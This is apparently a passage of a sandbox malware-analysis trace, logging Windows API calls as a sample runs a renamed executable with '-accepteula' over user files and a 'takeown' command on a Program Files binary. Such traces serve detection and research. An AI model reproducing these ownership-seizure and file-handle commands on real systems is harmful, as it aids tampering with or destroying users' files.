Flags=0x8, Size=0x22) returned 0x5f24a8 [0224.216] GetProcessHeap () returned 0x5e0000 [0224.216] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x60) returned 0x5f24d8 [0224.217] GetConsoleTitleW (in: lpConsoleTitle=0x3bf730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.218] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0224.219] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0224.220] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0224.221] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0224.222] GetProcessHeap () returned 0x5e0000 [0224.222] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x210) returned 0x5f2540 [0224.222] GetProcessHeap () returned 0x5e0000 [0224.222] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x7a) returned 0x5f2758 [0224.222] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0224.223] GetProcessHeap () returned 0x5e0000 [0224.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x418) returned 0x5f27e0 [0224.223] SetErrorMode (uMode=0x0) returned 0x0 [0224.223] SetErrorMode (uMode=0x1) returned 0x0 [0224.223] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5f27e8, lpFilePart=0x3bf250 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf250*="Desktop") returned 0x25 [0224.223] SetErrorMode (uMode=0x0) returned 0x1 [0224.223] GetProcessHeap () returned 0x5e0000 [0224.223] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f27e0, Size=0x6e) returned 0x5f27e0 [0224.223] GetProcessHeap () returned 0x5e0000 [0224.223] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f27e0) returned 0x6e [0224.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0224.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0224.223] GetProcessHeap () returned 0x5e0000 [0224.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x120) returned 0x5f2858 [0224.223] GetProcessHeap () returned 0x5e0000 [0224.224] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x238) returned 0x5f2980 [0224.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.714] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x3befec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3befec) returned 0x5f2b30 [0224.714] GetProcessHeap () returned 0x5e0000 [0224.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5f2b70 [0224.714] FindClose (in: hFindFile=0x5f2b30 | out: hFindFile=0x5f2b30) returned 1 [0224.715] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0224.715] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0224.715] GetConsoleTitleW (in: lpConsoleTitle=0x3bf4c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.715] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bf34c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3bf414 | out: lpAttributeList=0x3bf34c, lpSize=0x3bf414) returned 1 [0224.715] UpdateProcThreadAttribute (in: lpAttributeList=0x3bf34c, dwFlags=0x0, Attribute=0x60001, lpValue=0x3bf40c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bf34c, lpPreviousValue=0x0) returned 1 [0224.715] GetStartupInfoW (in: lpStartupInfo=0x3bf308 | out: lpStartupInfo=0x3bf308*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0224.716] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0224.717] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bf3a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3bf3f4 | out: lpCommandLine="tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner", lpProcessInformation=0x3bf3f4*(hProcess=0x78, hThread=0x74, dwProcessId=0xac4, dwThreadId=0x130)) returned 1 [0225.614] CloseHandle (hObject=0x74) returned 1 [0225.614] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0225.614] GetProcessHeap () returned 0x5e0000 [0225.614] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2da0 | out: hHeap=0x5e0000) returned 1 [0225.614] GetEnvironmentStringsW () returned 0x5f2b90* [0225.614] GetProcessHeap () returned 0x5e0000 [0225.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xb8c) returned 0x5f74f8 [0225.614] FreeEnvironmentStringsW (penv=0x5f2b90) returned 1 [0225.614] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0229.553] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3bf2e8 | out: lpExitCode=0x3bf2e8*=0x1) returned 1 [0229.553] CloseHandle (hObject=0x78) returned 1 [0229.554] _vsnwprintf (in: _Buffer=0x3bf430, _BufferCount=0x13, _Format="%08X", _ArgList=0x3bf2f4 | out: _Buffer="00000001") returned 8 [0229.554] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0229.554] GetProcessHeap () returned 0x5e0000 [0229.554] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f74f8 | out: hHeap=0x5e0000) returned 1 [0229.554] GetEnvironmentStringsW () returned 0x5f2b90* [0229.554] GetProcessHeap () returned 0x5e0000 [0229.554] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xb8c) returned 0x5f74f8 [0229.554] FreeEnvironmentStringsW (penv=0x5f2b90) returned 1 [0229.554] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0229.554] GetProcessHeap () returned 0x5e0000 [0229.554] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f74f8 | out: hHeap=0x5e0000) returned 1 [0229.554] GetEnvironmentStringsW () returned 0x5f2b90* [0229.554] GetProcessHeap () returned 0x5e0000 [0229.554] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xb8c) returned 0x5f74f8 [0229.554] FreeEnvironmentStringsW (penv=0x5f2b90) returned 1 [0229.554] GetProcessHeap () returned 0x5e0000 [0229.554] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f00e8 | out: hHeap=0x5e0000) returned 1 [0229.554] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bf34c | out: lpAttributeList=0x3bf34c) [0229.554] _get_osfhandle (_FileHandle=1) returned 0x80 [0229.554] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0229.554] _get_osfhandle (_FileHandle=1) returned 0x80 [0229.554] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0229.555] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.555] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0229.555] SetConsoleInputExeNameW () returned 0x1 [0229.555] GetConsoleOutputCP () returned 0x1b5 [0229.555] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0229.555] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.555] exit (_Code=1) Process: id = "230" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x2a234000" os_pid = "0x120" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "201" os_parent_pid = "0x7d8" cmd_line = "takeown /F \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 817 os_tid = 0xb0 Process: id = "231" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2ad4e000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "226" os_parent_pid = "0x5d0" cmd_line = "tdq963ii.exe -accepteula \"Journal.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 822 os_tid = 0x710 [0224.153] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0224.154] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0224.154] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0224.154] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0224.154] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0224.154] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0224.539] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0224.539] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0224.539] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0224.539] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0224.540] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0224.541] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0224.542] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0224.543] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0224.544] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0224.545] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0224.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0224.547] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0224.547] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0224.547] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0224.547] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0224.547] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0224.548] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0224.548] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0224.548] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0224.548] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0224.548] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0224.548] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0224.548] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0224.548] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0224.548] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0224.548] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0224.549] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0224.549] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0224.549] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0224.549] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0224.549] GetProcAddress 